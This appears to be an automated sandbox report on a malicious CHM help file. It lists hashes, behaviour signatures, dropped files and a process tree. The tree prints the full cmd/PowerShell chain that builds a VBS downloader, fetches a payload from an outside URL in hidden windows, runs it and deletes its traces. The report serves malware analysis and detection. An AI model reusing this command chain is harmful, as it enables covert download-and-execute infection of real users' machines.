Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    29-01-2025 02:15

General

  • Target

    1add121c2feec6d6e010da17f2a84fe71236b6ab1f55a62a02014f72b62ce3a4.chm

  • Size

    75KB

  • MD5

    9c8a5461b7d545e1df98e0d63bc27ec2

  • SHA1

    bef27ecbd3832ecd148c81bf3a3272408833e492

  • SHA256

    1add121c2feec6d6e010da17f2a84fe71236b6ab1f55a62a02014f72b62ce3a4

  • SHA512

    ad2cc969ad7dbbf88908e5e85d93e193b47dc1a0bf48cd3eff578434ceaa541f41d874f7531baf52809a3767d50a15110789ead221e92f61514bbfc53e0e96ac

  • SSDEEP

    1536:4G2kZqDwXQa3OFBLedkZdWSycuSF02YqlO5Szs7HJiJl:R2kZZXHMBL7hr1W2VlOW

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\hh.exe
    "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\1add121c2feec6d6e010da17f2a84fe71236b6ab1f55a62a02014f72b62ce3a4.chm
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2848
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe > nul && echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>C:\\Users\\Public\\aloha.vbs & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd" & powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break" & del /q "C:\Users\Public\ript.exe" / A / F / Q / S >nul & del /q "C:\Users\Public\aloha.vbs" / A / F / Q / S >nul & taskkill /F /IM hh.exe & exit
      2⤵
      • Hide Artifacts: Hidden Window
      • Suspicious use of WriteProcessMemory
      PID:2892
      • C:\Windows\system32\extrac32.exe
        extrac32 /y /C C:\Windows\system32\cscript.exe C:\\Users\\Public\\ript.exe
        3⤵
          PID:2720
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "C:\\Users\\Public\\ript.exe C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2968
          • C:\Users\Public\ript.exe
            "C:\Users\Public\ript.exe" C:\\Users\\Public\\aloha.vbs https://projectvends.org/WPS/P.cmd C:\\Users\\Public\\df.cmd
            4⤵
            • Executes dropped EXE
            • Modifies system certificate store
            PID:264
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -WindowStyle hidden -inputformat none -outputformat none -NonInteractive -Command "start C:\\Users\\Public\\df.cmd ;Break"
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2304
          • C:\Windows\system32\cmd.exe
            cmd /c ""C:\Users\Public\df.cmd" "
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3032
            • C:\Windows\system32\extrac32.exe
              extrac32 /y "C:\Users\Public\df.cmd" "C:\Users\Admin\AppData\Local\Temp\x.exe"
              5⤵
                PID:2332
              • C:\Users\Admin\AppData\Local\Temp\x.exe
                "C:\Users\Admin\AppData\Local\Temp\x.exe"
                5⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                PID:2636
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM hh.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2732

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\x.exe

        Filesize

        1.1MB

        MD5

        bbc7fc385a2e1198bc272acb466a70a9

        SHA1

        7352a3101f8e53f694fa1af71e57bda25655ce08

        SHA256

        7babe42bb73034aa6b7b9007ad1a07168f3302eba34a4caff6ce9c5f081fa4f5

        SHA512

        033227e1678e5fb3b844e64dfc7974ad76c9ca15d585935e13f7464749feae14319cc3a4406fd79fa0dff553be9f558938d30caecf09503c8c6a4b389eb3dd58

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        7347e96441a80c1b6faa40469cfdba3f

        SHA1

        3c7780b60d1a8f497c99dd6fcf982eb107544044

        SHA256

        1877f192851664804cdb2045226374d44b50418f6818edccb7367dda301ec471

        SHA512

        2ea7195f21e8f3902191a60f26a16dfe65e6f3d0e101bb620d909ccc4ede532252c445c1a62025b013c61a41972a002537f31610b84b63be2a8b618a499f854f

      • C:\Users\Public\aloha.vbs

        Filesize

        194B

        MD5

        71efa4ec6c67fa5665b1d0c64d60fc25

        SHA1

        f546eda2b94df327b7ad5fa5bb0ba20cd37b2623

        SHA256

        08212be8f6fd3d4312f20a7604807c04da643333f07267c7e9713a452e079898

        SHA512

        7b1bbbb23e21cd011964397860b1cf5bdebbd20b6b3d5317c13ff5b3bdb0223a51c036be2b730254c11725a69c34ab90d2ae24872af788e076914364a82b31d6

      • C:\Users\Public\df.cmd

        Filesize

        1.1MB

        MD5

        298baf7c77327a1641678b6807c230b4

        SHA1

        e8fd19fcc7722c2a1644478339b3b766bb2a08dc

        SHA256

        8f5897f90faa79aafbcc79d2b0e69a5c4c47ca9b9b55206ec7f293baaafc3b35

        SHA512

        11bda296eafcdf657f0cf9bf8302fcf695a701cbff895cbbd203141be6a41693c9544fa778acd901051f271385c22d1fc87d931de0bcc02e0a9db53822155014

      • C:\Users\Public\ript.exe

        Filesize

        152KB

        MD5

        791af7743252d0cd10a30d61e5bc1f8e

        SHA1

        70096a77e202cf9f30c064956f36d14bcbd8f7bb

        SHA256

        e34910c8c4f2051b1b87f80e9b389dfe3583bb3e4da909bb2544f22c2d92cf15

        SHA512

        d564f20748189de62525d2c0d4a199a272e3b273a38bd2ccd0bd7f9141f118eae08223b2a0739cd9bdf73234a0f0fb3566eaf88884462e494d44617bd9ac3ccb

      • memory/2304-53-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

        Filesize

        2.9MB

      • memory/2304-54-0x0000000002870000-0x0000000002878000-memory.dmp

        Filesize

        32KB

      • memory/2636-62-0x0000000000400000-0x0000000000519000-memory.dmp

        Filesize

        1.1MB

      • memory/2636-61-0x00000000032C0000-0x00000000042C0000-memory.dmp

        Filesize

        16.0MB

      • memory/2968-25-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

        Filesize

        2.9MB

      • memory/2968-26-0x0000000001F50000-0x0000000001F58000-memory.dmp

        Filesize

        32KB